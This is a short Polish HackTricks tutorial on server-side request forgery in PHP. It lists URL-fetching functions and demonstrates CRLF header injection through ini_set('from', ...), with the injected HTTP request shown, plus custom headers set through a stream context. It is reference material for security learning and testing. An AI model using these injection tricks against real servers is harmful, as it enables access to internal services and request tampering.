PHP SSRF

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Try Hard Security Group


Funkcje PHP do SSRF

Niektóre funkcje takie jak file_get_contents(), fopen(), file(), md5_file() akceptują adresy URL jako dane wejściowe, które będą śledzone, co może prowadzić do podatności na SSRF, jeśli użytkownik może kontrolować dane:

file_get_contents("http://127.0.0.1:8081");
fopen("http://127.0.0.1:8081", "r");
file("http://127.0.0.1:8081");
md5_file("http://127.0.0.1:8081");

CRLF

Co więcej, w niektórych przypadkach może nawet być możliwe wysłanie dowolnych nagłówków za pomocą "luki" CRLF w poprzednich funkcjach:

# The following will create a header called from with value Hi and
# an extra header "Injected: I HAVE IT"
ini_set("from", "Hi\r\nInjected: I HAVE IT");
file_get_contents("http://127.0.0.1:8081");

GET / HTTP/1.1
From: Hi
Injected: I HAVE IT
Host: 127.0.0.1:8081
Connection: close

# Any of the previously mentioned functions will send those headers

Aby uzyskać więcej informacji na temat tej luki CRLF, sprawdź ten błąd https://bugs.php.net/bug.php?id=81680&edit=1

Zauważ, że te funkcje mogą mieć inne metody ustawiania arbitralnych nagłówków w żądaniach, takie jak:

$url = "";

$options = array(
'http'=>array(
'method'=>"GET",
'header'=>"Accept-language: en\r\n" .
"Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
"User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad
)
);

$context = stream_context_create($options);
$file = file_get_contents($url, false, $context);

Grupa Try Hard Security

Zdobądź wiedzę na temat hakowania AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated